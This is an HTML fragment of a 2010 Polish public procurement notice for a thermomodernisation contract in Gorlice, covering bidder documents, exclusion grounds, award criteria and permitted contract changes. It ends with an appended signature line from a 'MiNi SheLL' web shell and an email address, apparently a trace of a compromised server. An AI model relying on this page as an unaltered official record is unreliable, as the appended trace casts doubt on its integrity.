<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, pod warunkiem przeprowadzenia jej zgodnie z zapisami zawartymi w Części II niniejszej SIWZ, dotyczące:
1) terminu wykonania zamówienia, w przypadku zmiany terminu realizacji kontraktu kontraktów na roboty budowlane,
a) spowodowanej warunkami atmosferycznymi - w przypadku wystąpienia klęski żywiołowej lub gdy warunki atmosferyczne odbiegają od warunków określonych w SST i uniemożliwiają prowadzenie robót budowlanych, przeprowadzanie prób i sprawdzeń oraz dokonywanie odbiorów, o czas niezbędny do wykonania czynności po ustaniu 
b)spowodowanej warunkami geologicznymi, wystąpieniem wykopalisk i odkryć archeologicznych oraz o znaczeniu  historycznym, bądź wystąpieniem niewybuchów, niewypałów uniemożliwiających prowadzenie robót; wszystkie przedmioty o znaczeniu historycznym lub też przedstawiające znaczną wartość odkryte na terenie budowy, będą przekazane pod opiekę konserwatora zabytków; Wykonawca niezwłocznie zabezpieczy znaleziska przed osobami trzecimi; Wykonawca niezwłoczne powiadomi inspektora nadzoru o takich odkryciach i wykona jego polecenia, co do obchodzenia się z nimi i dalszego trybu postępowania, o czas niezbędny do usunięcia zdarzenia zgodnie z przepisami.
c) spowodowanej przedłużającą się procedurą udzielania zamówienia, w szczególności na skutek przedłużającego się postępowania przed Krajową Izbą Odwoławczą, o czas niezależnego od zamawiającego wydłużenia
2) sposobu i zakresu wykonania zamówienia w przypadku:
a) ograniczenia zakresu zamówienia wynikającego z braku środków finansowych 
lub zmiany wielkości dofinansowania ze środków POIiŚ na realizację Projektu, wynikających ze zmiany umowy zawartej z Instytucją Finansującą.
b) ograniczenia zakresu prac z przyczyn nie leżących po stronie Zamawiającego
 i Wykonawcy, których nie dało się przewidzieć w dniu podpisania umowy. 
Ograniczenie to może wynikać z złożenia w trakcie realizacji umowy oświadczenia woli dysponującego terenem lub obiektem od którego uzależnione jest wykonanie zadania.
Strony dokonają wraz z ograniczeniem zakresu zmniejszenia umownego wynagrodzenia
Wykonawcy Robót na podstawie kosztorysu rozliczeniowego sporządzonego na
czynnikach jak w kosztorysie ofertowym.
c) wystąpienia siły wyższej
3) innych postanowień umowy w przypadku:
a) zmiany stawek podatku od towarów i usług,
b) zmiany podwykonawców lub zmian personalnych w składzie zespołu Inżyniera.
c) zmiany danych podmiotowych dotyczących Inżyniera.
5)zmianie dotyczącej zakresu robót i wynagrodzenia, jeżeli wystąpią: 
a)nieprzewidziane kolizje z robotami prowadzonymi równolegle przez inne podmioty; w takim przypadku zmiany w umowie zostaną ograniczone do zmian powodujących uniknięcie lub usunięcie kolizji jak: zmiana sposobu wykonania, materiałów, technologii, lokalizacji wbudowywanych urządzeń oraz zmiana terminu i wynagrodzenia;
b)okoliczności powodujące zmniejszenie zakresu przedmiotu zamówienia; w przypadku zmniejszenia zakresu przedmiotu zamówienia przez Zamawiającego, wynagrodzenie należne Wykonawcy za wykonane roboty pozostaje w takim stosunku do umownego wynagrodzenia, w jakim wykonane roboty budowlane pozostają do całości robót określonych umową; 
6)zmianie osobowej: zmiana osób przy pomocy, których Wykonawca realizuje przedmiot umowy na inne spełniające warunki określone w SIWZ lub zmiana - za zgodą Zamawiającego, podwykonawców nie wskazanych w ofercie (lub zakresu wskazanego w ofercie jako planowany do powierzenia podwykonawcom); zmiana taka nie wymaga aneksu do umowy i może być przeprowadzona przy zachowaniu procedury zatwierdzenia podwykonawców wynikającej z przepisów prawa i SIWZ,
7)zmianie warunków płatności na rzecz Wykonawcy na skutek  zmian zawartej przez Zmawiającego umowy o dofinansowanie projektu lub wytycznych Instytucji Zarządzającej dotyczących realizacji projektu, w tym ograniczenia zakresu zamówienia wynikającego z braku środków finansowych lub zmiany wielkości dofinansowania ze środków POIiŚ na realizację Projektu,
8)zmianie spowodowanej wystąpieniem siły wyższej, czyli zdarzenia, którego Strony nie mogły przewidzieć i któremu nie mogły zapobiec, ani któremu nie mogą przeciwdziałać, a które uniemożliwia Wykonawcy wykonanie w części lub całości jego zobowiązań; jeżeli wykonanie umowy jest niemożliwe z powodu siły wyższej to inspektor nadzoru zaświadczy, że wykonanie umowy jest niemożliwe; Wykonawca zabezpieczy teren budowy tak szybko jak jest to możliwe i wstrzyma roboty, a Zamawiający zapłaci wynagrodzenie za wykonane roboty,
9)terminu wykonania zamówienia spowodowanej zmianami harmonogramu realizacji projektu stanowiącego załącznik do umowy o dofinansowanie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> SIWZ dostępna na stronie internetowej Biuletynu Informacji Publicznej Związku Gmin Ziemi Gorlickiej<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Związek Gmin Ziemi Gorlickiej,  
38-300 Gorlice,  
ul. Jagiełły 10,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2010 godzina 13:00, miejsce: Związek Gmin Ziemi Gorlickiej,  
38-300 Gorlice,  
ul. Jagiełły 10,-sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane ze środków publicznych w ramach:
Priorytetu IX Programu Operacyjnego Infrastruktura i Środowisko 2007-2013.
Działanie 9.3 Termomodernizacja obiektów użyteczności publicznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com